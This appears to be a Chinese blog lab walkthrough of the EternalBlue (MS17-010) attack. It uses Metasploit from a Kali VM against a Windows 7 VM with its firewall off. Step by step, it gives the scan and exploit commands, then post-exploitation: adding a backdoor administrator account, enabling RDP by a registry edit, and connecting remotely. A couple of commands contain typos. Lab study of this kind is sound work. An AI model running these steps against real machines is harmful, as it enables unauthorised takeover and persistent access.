永恒之蓝ms17_010漏洞

复现环境:

1.攻击机:kali2022(192.168.1.50)

2.靶机:win7 enterprise(192.168.1.55)

关闭靶机win7防火墙

两台虚拟机已经互相ping通

1.探测我们要攻击的靶机

登录kali,用nmap探测本网段存活的主机:namp 192.168.1.0/24

可以看到我们靶机的445端口是开放状态的

2.使用msf永恒之蓝模块

输入:msfconsole打开MSF

搜索ms17_010代码:search ms17_010

 0号1号是攻击模块,3号是扫描模块,先扫描如果有漏洞,再进行攻击。

3.使用ms17_010扫描模块对靶机进行扫描:use auxiliary/scanner/smb/smb_ms17_010

设置目标ip或网段:set rhosts 192.168.1.55

 执行扫描:run

 如图,说明漏洞存在

4.使用ms17_010攻击模块对靶机进行攻击:use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标ip:set rhosts 192.168.1.55

执行攻击:exploit 或 run

攻击成功

5.获取靶机shell:shell

解决乱码问题:chcp 65001

6.通过shell对靶机进行控制:

 1、创建新用户:net user 1 123456 、add

因为我已经创建过一次了,直接看下面步骤

 2、将用户1添加至管理员:net localgroup administrators 1 /add

 3、开启远程桌面:

      首先查看开启的端口:netstat -ano

      发现3389端口并没有开启,使用命令开启:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

到这里, 我们发现3389端口已经开启了

 4、远程桌面连接靶机:另起一个终端输入命令:rdesktop 192.168.1.55

成功!感谢观看!

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值